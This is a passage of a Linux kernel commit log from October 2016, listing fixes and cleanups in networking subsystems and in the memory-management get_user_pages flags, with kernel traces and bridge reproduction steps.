Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:32:22 -04:00
Jiri Bohac
7aa8e63f0d ipv6: properly prevent temp_prefered_lft sysctl race
The check for an underflow of tmp_prefered_lft is always false
because tmp_prefered_lft is unsigned. The intention of the check
was to guard against racing with an update of the
temp_prefered_lft sysctl, potentially resulting in an underflow.

As suggested by David Miller, the best way to prevent the race is
by reading the sysctl variable using READ_ONCE.

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Reported-by: Julia Lawall <julia.lawall@lip6.fr>
Fixes: 76506a986d ("IPv6: fix DESYNC_FACTOR")
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:29:11 -04:00
Pablo Neira Ayuso
7034b566a4 netfilter: fix nf_queue handling
nf_queue handling is broken since e3b37f11e6 ("netfilter: replace
list_head with single linked list") for two reasons:

1) If the bypass flag is set on, there are no userspace listeners and
   we still have more hook entries to iterate over, then jump to the
   next hook. Otherwise accept the packet. On nf_reinject() path, the
   okfn() needs to be invoked.

2) We should not re-enter the same hook on packet reinjection. If the
   packet is accepted, we have to skip the current hook from where the
   packet was enqueued, otherwise the packets gets enqueued over and
   over again.

This restores the previous list_for_each_entry_continue() behaviour
happening from nf_iterate() that was dealing with these two cases.
This patch introduces a new nf_queue() wrapper function so this fix
becomes simpler.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20 19:59:59 +02:00
Nicolas Dichtel
7bb6615d39 netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reached
When the maximum evictions number is reached, do not wait 5 seconds before
the next run.

CC: Florian Westphal <fw@strlen.de>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20 19:59:53 +02:00
Eric Dumazet
9652dc2eb9 tcp: relax listening_hash operations
softirq handlers use RCU protection to lookup listeners,
and write operations all happen from process context.
We do not need to block BH for dump operations.

Also SYN_RECV since request sockets are stored in the ehash table :

 1) inet_diag_dump_icsk() no longer need to clear
    cb->args[3] and cb->args[4] that were used as cursors while
    iterating the old per listener hash table.

 2) Also factorize a test : No need to scan listening_hash[]
    if r->id.idiag_dport is not zero.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:24:32 -04:00
Gavin Shan
22d8aa93d7 net/ncsi: Improve HNCDSC AEN handler
This improves AEN handler for Host Network Controller Driver Status
Change (HNCDSC):

   * The channel's lock should be hold when accessing its state.
   * Do failover when host driver isn't ready.
   * Configure channel when host driver becomes ready.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:08 -04:00
Gavin Shan
bbc7c01e95 net/ncsi: Choose hot channel as active one if necessary
The issue was found on BCM5718 which has two NCSI channels in one
package: C0 and C1. C0 is in link-up state while C1 is in link-down
state. C0 is chosen as active channel until unplugging and plugging
C0's cable:  On unplugging C0's cable, LSC (Link State Change) AEN
packet received on C0 to report link-down event. After that, C1 is
chosen as active channel. LSC AEN for link-up event is lost on C0
when plugging C0's cable back. We lose the network even C0 is usable.

This resolves the issue by recording the (hot) channel that was ever
chosen as active one. The hot channel is chosen to be active one
if none of available channels in link-up state. With this, C0 is still
the active one after unplugging C0's cable. LSC AEN packet received
on C0 when plugging its cable back.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Gavin Shan
008a424a24 net/ncsi: Fix stale link state of inactive channels on failover
The issue was found on BCM5718 which has two NCSI channels in one
package: C0 and C1. Both of them are connected to different LANs,
means they are in link-up state and C0 is chosen as the active one
until resetting BCM5718 happens as below.

Resetting BCM5718 results in LSC (Link State Change) AEN packet
received on C0, meaning LSC AEN is missed on C1. When LSC AEN packet
received on C0 to report link-down, it fails over to C1 because C1
is in link-up state as software can see. However, C1 is in link-down
state in hardware. It means the link state is out of synchronization
between hardware and software, resulting in inappropriate channel (C1)
selected as active one.

This resolves the issue by sending separate GLS (Get Link Status)
commands to all channels in the package before trying to do failover.
The last link states of all channels in the package are retrieved.
With it, C0 (not C1) is selected as active one as expected.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Gavin Shan
7ba5c003db net/ncsi: Avoid if statements in ncsi_suspend_channel()
There are several if/else statements in the state machine implemented
by switch/case in ncsi_suspend_channel() to avoid duplicated code. It
makes the code a bit hard to be understood.

This drops if/else statements in ncsi_suspend_channel() to improve the
code readability as Joel Stanley suggested. Also, it becomes easy to
add more states in the state machine without affecting current code.
No logical changes introduced by this.

Suggested-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Thomas Graf
c5098ebbd6 ila: Fix tailroom allocation of lwtstate
Tailroom is supposed to be of length sizeof(struct ila_lwt) but
sizeof(struct ila_params) is currently allocated.

This leads to the dst_cache and connected member of ila_lwt being
referenced out of bounds.

struct ila_lwt {
	struct ila_params p;
	struct dst_cache dst_cache;
	u32 connected : 1;
};

Fixes: 65d7ab8de5 ("net: Identifier Locator Addressing module")
Signed-off-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:17:55 -04:00
Paul Blakey
5712bf9c5c net/sched: act_mirred: Use passed lastuse argument
stats_update callback is called by NIC drivers doing hardware
offloading of the mirred action. Lastuse is passed as argument
to specify when the stats was actually last updated and is not
always the current time.

Fixes: 9798e6fe4f ('net: act_mirred: allow statistic updates from offloaded actions')
Signed-off-by: Paul Blakey <paulb@mellanox.com>
Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:14:24 -04:00
Jiri Benc
76e4cc7731 openvswitch: remove unnecessary EXPORT_SYMBOLs
Some symbols exported to other modules are really used only by
openvswitch.ko. Remove the exports.

Tested by loading all 4 openvswitch modules, nothing breaks.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 15:11:55 -04:00
Jiri Benc
f33eb0cf99 openvswitch: remove unused functions
ovs_vport_deferred_free is not used anywhere. It's the only caller of
free_vport_rcu thus this one can be removed, too.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 15:11:55 -04:00
Michał Narajowski
f61851f64b Bluetooth: Fix append max 11 bytes of name to scan rsp data
Append maximum of 10 + 1 bytes of name to scan response data.
Complete name is appended only if exists and is <= 10 characters.
Else append short name if exists or shorten complete name if not.
This makes sure name is consistent across multiple advertising
instances.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-19 18:42:37 +02:00
Florian Westphal
1ecc281ec2 netfilter: x_tables: suppress kmemcheck warning
Markus Trippelsdorf reports:

WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480)
4055601e0088ffff000000000000000090686d81ffffffff0000000000000000
 u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u
 ^
|RIP: 0010:[<ffffffff8166e561>]  [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
[..]
 [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
 [<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0
 [<ffffffff816d6715>] ipt_register_table+0xe5/0x110
[..]

This warning is harmless; we copy 'uninitialized' data from the hook ops
but it will not be used.
Long term the structures keeping run-time data should be disentangled
from those only containing config-time data (such as where in the list
to insert a hook), but thats -next material.

Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Suggested-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Florian Westphal <fw@strlen.de>
Acked-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-19 18:32:24 +02:00
Linus Torvalds
63ae602cea Merge branch 'gup_flag-cleanups'
Merge the gup_flags cleanups from Lorenzo Stoakes:
 "This patch series adjusts functions in the get_user_pages* family such
  that desired FOLL_* flags are passed as an argument rather than
  implied by flags.

  The purpose of this change is to make the use of FOLL_FORCE explicit
  so it is easier to grep for and clearer to callers that this flag is
  being used.  The use of FOLL_FORCE is an issue as it overrides missing
  VM_READ/VM_WRITE flags for the VMA whose pages we are reading
  from/writing to, which can result in surprising behaviour.

  The patch series came out of the discussion around commit 38e0885465
  ("mm: check VMA flags to avoid invalid PROT_NONE NUMA balancing"),
  which addressed a BUG_ON() being triggered when a page was faulted in
  with PROT_NONE set but having been overridden by FOLL_FORCE.
  do_numa_page() was run on the assumption the page _must_ be one marked
  for NUMA node migration as an actual PROT_NONE page would have been
  dealt with prior to this code path, however FOLL_FORCE introduced a
  situation where this assumption did not hold.

  See

      https://marc.info/?l=linux-mm&m=147585445805166

  for the patch proposal"

Additionally, there's a fix for an ancient bug related to FOLL_FORCE and
FOLL_WRITE by me.

[ This branch was rebased recently to add a few more acked-by's and
  reviewed-by's ]

* gup_flag-cleanups:
  mm: replace access_process_vm() write parameter with gup_flags
  mm: replace access_remote_vm() write parameter with gup_flags
  mm: replace __access_remote_vm() write parameter with gup_flags
  mm: replace get_user_pages_remote() write/force parameters with gup_flags
  mm: replace get_user_pages() write/force parameters with gup_flags
  mm: replace get_vaddr_frames() write/force parameters with gup_flags
  mm: replace get_user_pages_locked() write/force parameters with gup_flags
  mm: replace get_user_pages_unlocked() write/force parameters with gup_flags
  mm: remove write/force parameters from __get_user_pages_unlocked()
  mm: remove write/force parameters from __get_user_pages_locked()
  mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
2016-10-19 08:39:47 -07:00
Eric Dumazet
82454581d7 tcp: do not export sysctl_tcp_low_latency
Since commit b2fb4f54ec ("tcp: uninline tcp_prequeue()") we no longer
access sysctl_tcp_low_latency from a module.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 11:12:41 -04:00
Ido Schimmel
97c242902c switchdev: Execute bridge ndos only for bridge ports
We recently got the following warning after setting up a vlan device on
top of an offloaded bridge and executing 'bridge link':

WARNING: CPU: 0 PID: 18566 at drivers/net/ethernet/mellanox/mlxsw/spectrum_switchdev.c:81 mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[...]
 CPU: 0 PID: 18566 Comm: bridge Not tainted 4.8.0-rc7 #1
 Hardware name: Mellanox Technologies Ltd. Mellanox switch/Mellanox switch, BIOS 4.6.5 05/21/2015
  0000000000000286 00000000e64ab94f ffff880406e6f8f0 ffffffff8135eaa3
  0000000000000000 0000000000000000 ffff880406e6f930 ffffffff8108c43b
  0000005106e6f988 ffff8803df398840 ffff880403c60108 ffff880406e6f990
 Call Trace:
  [<ffffffff8135eaa3>] dump_stack+0x63/0x90
  [<ffffffff8108c43b>] __warn+0xcb/0xf0
  [<ffffffff8108c56d>] warn_slowpath_null+0x1d/0x20
  [<ffffffffa01420d5>] mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
  [<ffffffffa0142195>] mlxsw_sp_port_attr_get+0xa5/0xb0 [mlxsw_spectrum]
  [<ffffffff816f151f>] switchdev_port_attr_get+0x4f/0x140
  [<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
  [<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
  [<ffffffff816f1d6b>] switchdev_port_bridge_getlink+0x5b/0xc0
  [<ffffffff816f2680>] ? switchdev_port_fdb_dump+0x90/0x90
  [<ffffffff815f5427>] rtnl_bridge_getlink+0xe7/0x190
  [<ffffffff8161a1b2>] netlink_dump+0x122/0x290
  [<ffffffff8161b0df>] __netlink_dump_start+0x15f/0x190
  [<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
  [<ffffffff815fab46>] rtnetlink_rcv_msg+0x1a6/0x220
  [<ffffffff81208118>] ? __kmalloc_node_track_caller+0x208/0x2c0
  [<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
  [<ffffffff815fa9a0>] ? rtnl_newlink+0x890/0x890
  [<ffffffff8161cf54>] netlink_rcv_skb+0xa4/0xc0
  [<ffffffff815f56f8>] rtnetlink_rcv+0x28/0x30
  [<ffffffff8161c92c>] netlink_unicast+0x18c/0x240
  [<ffffffff8161ccdb>] netlink_sendmsg+0x2fb/0x3a0
  [<ffffffff815c5a48>] sock_sendmsg+0x38/0x50
  [<ffffffff815c6031>] SYSC_sendto+0x101/0x190
  [<ffffffff815c7111>] ? __sys_recvmsg+0x51/0x90
  [<ffffffff815c6b6e>] SyS_sendto+0xe/0x10
  [<ffffffff817017f2>] entry_SYSCALL_64_fastpath+0x1a/0xa4

The problem is that the 8021q module propagates the call to
ndo_bridge_getlink() via switchdev ops, but the switch driver doesn't
recognize the netdev, as it's not offloaded.

While we can ignore calls being made to non-bridge ports inside the
driver, a better fix would be to push this check up to the switchdev
layer.

Note that these ndos can be called for non-bridged netdev, but this only
happens in certain PF drivers which don't call the corresponding
switchdev functions anyway.

Fixes: 99f44bb352 ("mlxsw: spectrum: Enable L3 interfaces on top of bridge devices")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Tested-by: Tamir Winetroub <tamirw@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:58:04 -04:00
Ido Schimmel
e4961b0768 net: core: Correctly iterate over lower adjacency list
Tamir reported the following trace when processing ARP requests received
via a vlan device on top of a VLAN-aware bridge:

 NMI watchdog: BUG: soft lockup - CPU#1 stuck for 22s! [swapper/1:0]
[...]
 CPU: 1 PID: 0 Comm: swapper/1 Tainted: G        W       4.8.0-rc7 #1
 Hardware name: Mellanox Technologies Ltd. "MSN2100-CB2F"/"SA001017", BIOS 5.6.5 06/07/2016
 task: ffff88017edfea40 task.stack: ffff88017ee10000
 RIP: 0010:[<ffffffff815dcc73>]  [<ffffffff815dcc73>] netdev_all_lower_get_next_rcu+0x33/0x60
[...]
 Call Trace:
  <IRQ>
  [<ffffffffa015de0a>] mlxsw_sp_port_lower_dev_hold+0x5a/0xa0 [mlxsw_spectrum]
  [<ffffffffa016f1b0>] mlxsw_sp_router_netevent_event+0x80/0x150 [mlxsw_spectrum]
  [<ffffffff810ad07a>] notifier_call_chain+0x4a/0x70
  [<ffffffff810ad13a>] atomic_notifier_call_chain+0x1a/0x20
  [<ffffffff815ee77b>] call_netevent_notifiers+0x1b/0x20
  [<ffffffff815f2eb6>] neigh_update+0x306/0x740
  [<ffffffff815f38ce>] neigh_event_ns+0x4e/0xb0
  [<ffffffff8165ea3f>] arp_process+0x66f/0x700
  [<ffffffff8170214c>] ? common_interrupt+0x8c/0x8c
  [<ffffffff8165ec29>] arp_rcv+0x139/0x1d0
  [<ffffffff816e505a>] ? vlan_do_receive+0xda/0x320
  [<ffffffff815e3794>] __netif_receive_skb_core+0x524/0xab0
  [<ffffffff815e6830>] ? dev_queue_xmit+0x10/0x20
  [<ffffffffa06d612d>] ? br_forward_finish+0x3d/0xc0 [bridge]
  [<ffffffffa06e5796>] ? br_handle_vlan+0xf6/0x1b0 [bridge]
  [<ffffffff815e3d38>] __netif_receive_skb+0x18/0x60
  [<ffffffff815e3dc0>] netif_receive_skb_internal+0x40/0xb0
  [<ffffffff815e3e4c>] netif_receive_skb+0x1c/0x70
  [<ffffffffa06d7856>] br_pass_frame_up+0xc6/0x160 [bridge]
  [<ffffffffa06d63d7>] ? deliver_clone+0x37/0x50 [bridge]
  [<ffffffffa06d656c>] ? br_flood+0xcc/0x160 [bridge]
  [<ffffffffa06d7b14>] br_handle_frame_finish+0x224/0x4f0 [bridge]
  [<ffffffffa06d7f94>] br_handle_frame+0x174/0x300 [bridge]
  [<ffffffff815e3599>] __netif_receive_skb_core+0x329/0xab0
  [<ffffffff81374815>] ? find_next_bit+0x15/0x20
  [<ffffffff8135e802>] ? cpumask_next_and+0x32/0x50
  [<ffffffff810c9968>] ? load_balance+0x178/0x9b0
  [<ffffffff815e3d38>] __netif_receive_skb+0x18/0x60
  [<ffffffff815e3dc0>] netif_receive_skb_internal+0x40/0xb0
  [<ffffffff815e3e4c>] netif_receive_skb+0x1c/0x70
  [<ffffffffa01544a1>] mlxsw_sp_rx_listener_func+0x61/0xb0 [mlxsw_spectrum]
  [<ffffffffa005c9f7>] mlxsw_core_skb_receive+0x187/0x200 [mlxsw_core]
  [<ffffffffa007332a>] mlxsw_pci_cq_tasklet+0x63a/0x9b0 [mlxsw_pci]
  [<ffffffff81091986>] tasklet_action+0xf6/0x110
  [<ffffffff81704556>] __do_softirq+0xf6/0x280
  [<ffffffff8109213f>] irq_exit+0xdf/0xf0
  [<ffffffff817042b4>] do_IRQ+0x54/0xd0
  [<ffffffff8170214c>] common_interrupt+0x8c/0x8c

The problem is that netdev_all_lower_get_next_rcu() never advances the
iterator, thereby causing the loop over the lower adjacency list to run
forever.

Fix this by advancing the iterator and avoid the infinite loop.

Fixes: 7ce856aaaf ("mlxsw: spectrum: Add couple of lower device helper functions")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Reviewed-by: Jiri Pirko <jiri@mellanox.com>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:38:08 -04:00
Eric Garver
3805a938a6 flow_dissector: Check skb for VLAN only if skb specified.
Fixes a panic when calling eth_get_headlen(). Noticed on i40e driver.

Fixes: d5709f7ab7 ("flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci")
Signed-off-by: Eric Garver <e@erig.me>
Reviewed-by: Jakub Sitnicki <jkbs@redhat.com>
Acked-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:35:46 -04:00
Andrei Otcheretianski
0ea2a2ee8d cfg80211: allow vendor commands to be sent to nan interface
Allow vendor commands that require WIPHY_VENDOR_CMD_NEED_RUNNING flag
to be sent to NAN interface.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:16:02 +02:00
Ilan Peer
0711d63878 cfg80211: allow aborting in-progress connection atttempts
On a disconnect request from userspace, cfg80211 currently calls
called rdev_disconnect() only in case that 'current_bss' was set,
i.e. connection had been established.

Change this to allow the userspace call to succeed and call the
driver's disconnect() method also while the connection attempt is
in progress, to be able to abort attempts.

Signed-off-by: Ilan Peer <ilan.peer@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
[change commit subject/message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:15:38 +02:00
Emmanuel Grumbach
f438ceb81d mac80211: uapsd_queues is in QoS IE order
The uapsd_queue field is in QoS IE order and not in
IEEE80211_AC_*'s order.
This means that mac80211 would get confused between
BK and BE which is certainly not such a big deal but
needs to be fixed.

Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:13:54 +02:00
Sara Sharon
f3fe4e93dd mac80211: add a HW flag for supporting HW TX fragmentation
Currently mac80211 determines whether HW does fragmentation
by checking whether the set_frag_threshold callback is set
or not.
However, some drivers may want to set the HW fragmentation
capability depending on HW generation.
Allow this by checking a HW flag instead of checking the
callback.

Signed-off-by: Sara Sharon <sara.sharon@intel.com>
[added the flag to ath10k and wlcore]
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:44 +02:00
Emmanuel Grumbach
0aa419ec6e mac80211: allow the driver not to pass the tid to ieee80211_sta_uapsd_trigger
iwlwifi will check internally that the tid maps to an AC
that is trigger enabled, but can't know what tid exactly.
Allow the driver to pass a generic tid and make mac80211
assume that a trigger frame was received.

Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:19 +02:00
Johannes Berg
b473b8f12a mac80211: improve RX aggregation data in debugfs
When the driver sets the SUPPORTS_REORDERING_BUFFER hardware flag,
the debugfs data for RX aggregation sessions won't even indicate
that a session is open. Since the previous fix to store the dialog
token separately, we can indicate that it's open and add the token
so that there's at least some data (ssn is not available.)

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:11 +02:00
Johannes Berg
1c3d185a9a mac80211: fix tid_agg_rx NULL dereference
On drivers setting the SUPPORTS_REORDERING_BUFFER hardware flag,
we crash when the peer sends an AddBA request while we already
have a session open on the seame TID; this is because on those
drivers, the tid_agg_rx is left NULL even though the session is
valid, and the agg_session_valid bit is set.

To fix this, store the dialog tokens outside the tid_agg_rx to
be able to compare them to the received AddBA request.

Fixes: f89e07d4cf ("mac80211: agg-rx: refuse ADDBA Request with timeout update")
Reported-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:11:49 +02:00
Sven Eckelmann
4c7da0f6db batman-adv: Avoid precedence issues in macros
It must be avoided that arguments to a macro are evaluated ungrouped (which
enforces normal operator precendence). Otherwise the result of the macro
is not well defined.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:54 +02:00
Sven Eckelmann
507b37cf71 batman-adv: Use octal permissions instead of macros
Linus prefers to have octal permission numbers instead of combinations of
macro names ("random line noise"). Also old existing "bad symbolic
permission bit macro use" should be converted to octal numbers.
(http://lkml.kernel.org/r/CA+55aFw5v23T-zvDZp-MmD_EYxF8WbafwwB59934FV7g21uMGQ@mail.gmail.com)

Also remove the S_IFREG bit from the octal representation because it is
filtered out by debugfs_create.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:53 +02:00
Sven Eckelmann
70ea5cee95 batman-adv: Use proper name for gateway list head
The batman-adv codebase is using "list" for the list node (prev/next) and
<list content descriptor>+"_list" for the head of a list. Not using this
naming scheme can up in confusions when reading the code.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:53 +02:00
Sven Eckelmann
176e5b772b batman-adv: Use proper name for fragments list head
The batman-adv codebase is using "list" for the list node (prev/next) and
<list content descriptor>+"_list" for the head of a list. Not using this
naming scheme can up in confusions because list_head is used for both the
head of the list and the list node (prev/next) in each item of the list.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:52 +02:00
Sven Eckelmann
422d2f7780 batman-adv: Remove needless init of variables on stack
Some variables are overwritten immediatelly in a functions. These don't
have to be initialized to a specific value on the stack because the value
will be overwritten before they will be used anywhere.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:52 +02:00
Lorenzo Stoakes
c164154f66 mm: replace get_user_pages_unlocked() write/force parameters with gup_flags
This removes the 'write' and 'force' use from get_user_pages_unlocked()
and replaces them with 'gup_flags' to make the use of FOLL_FORCE
explicit in callers as use of this flag can result in surprising
behaviour (and hence bugs) within the mm subsystem.

Signed-off-by: Lorenzo Stoakes <lstoakes@gmail.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-18 14:13:37 -07:00
Gao Feng
9c403b6bee net: vlan: Use sizeof instead of literal number
Use sizeof variable instead of literal number to enhance the readability.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 14:23:23 -04:00
Eric Dumazet
41ee9c557e soreuseport: do not export reuseport_add_sock()
reuseport_add_sock() is not used from a module,
no need to export it.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 14:18:23 -04:00
Nikolay Aleksandrov
7cb3f9214d bridge: multicast: restore perm router ports on multicast enable
Satish reported a problem with the perm multicast router ports not getting
reenabled after some series of events, in particular if it happens that the
multicast snooping has been disabled and the port goes to disabled state
then it will be deleted from the router port list, but if it moves into
non-disabled state it will not be re-added because the mcast snooping is
still disabled, and enabling snooping later does nothing.

Here are the steps to reproduce, setup br0 with snooping enabled and eth1
added as a perm router (multicast_router = 2):
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
<empty>

At this point we have mcast enabled and eth1 as a perm router (value = 2)
but it is not in the router list which is incorrect.

After this change:
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
router ports on br0: eth1

Note: we can directly do br_multicast_enable_port for all because the
querier timer already has checks for the port state and will simply
expire if it's in blocking/disabled. See the comment added by
commit 9aa6638216 ("bridge: multicast: add a comment to
br_port_state_selection about blocking state")

Fixes: 561f1103a2 ("bridge: Add multicast_snooping sysfs toggle")
Reported-by: Satish Ashok <sashok@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 13:52:13 -04:00
David Ahern
67b62f98a1 net: dev: Improve debug statements for adjacency tracking
Adjacency code only has debugs for the insert case. Add debugs for
the remove path and make both consistently worded to make it easier
to follow the insert and removal with reference counts.

In addition, change the BUG to a WARN_ON. A missing adjacency at
removal time is not cause for a panic.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
0f524a80ff net: Add warning if any lower device is still in adjacency list
Lower list should be empty just like upper.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
f1170fd462 net: Remove all_adj_list and its references
Only direct adjacencies are maintained. All upper or lower devices can
be learned via the new walk API which recursively walks the adj_list for
upper devices or lower devices.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
1a3f060c1a net: Introduce new api for walking upper and lower devices
This patch introduces netdev_walk_all_upper_dev_rcu,
netdev_walk_all_lower_dev and netdev_walk_all_lower_dev_rcu. These
functions recursively walk the adj_list of devices to determine all upper
and lower devices.

The functions take a callback function that is invoked for each device
in the list. If the callback returns non-0, the walk is terminated and
the functions return that code back to callers.

v3
- simplified netdev_has_upper_dev_all_rcu and __netdev_has_upper_dev and
  removed typecast as suggested by Stephen

v2
- fixed definition of netdev_next_lower_dev_rcu to mirror the upper_dev
  version.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:44:58 -04:00
David Ahern
790510d99f net: Remove refnr arg when inserting link adjacencies
Commit 93409033ae ("net: Add netdev all_adj_list refcnt propagation to
fix panic") propagated the refnr to insert and remove functions tracking
the netdev adjacency graph. However, for the insert path the refnr can
only be 1. Accordingly, remove the refnr argument to make that clear.
ie., the refnr arg in 93409033ae was only needed for the remove path.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:44:58 -04:00
Arnd Bergmann
d2e4d59351 netfilter: nf_tables: avoid uninitialized variable warning
The newly added nft_range_eval() function handles the two possible
nft range operations, but as the compiler warning points out,
any unexpected value would lead to the 'mismatch' variable being
used without being initialized:

net/netfilter/nft_range.c: In function 'nft_range_eval':
net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized]

This removes the variable in question and instead moves the
condition into the switch itself, which is potentially more
efficient than adding a bogus 'default' clause as in my
first approach, and is nicer than using the 'uninitialized_var'
macro.

Fixes: 0f3cd9b369 ("netfilter: nf_tables: add range expression")
Link: http://patchwork.ozlabs.org/patch/677114/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-18 17:35:10 +02:00
Tobias Klauser
